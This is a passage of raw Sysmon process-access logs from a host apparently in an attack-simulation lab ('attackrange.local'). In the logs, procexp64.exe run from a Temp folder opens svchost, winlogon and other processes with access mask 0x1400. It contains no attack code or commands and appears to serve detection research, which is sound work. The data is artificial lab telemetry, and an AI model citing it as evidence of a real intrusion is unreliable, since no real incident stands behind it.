(x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789189Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789188Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789187Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789186Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789185Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789184Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789183Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789182Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789181Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789180Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789179Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789178Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789177Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789176Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789175Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789174Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789173Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL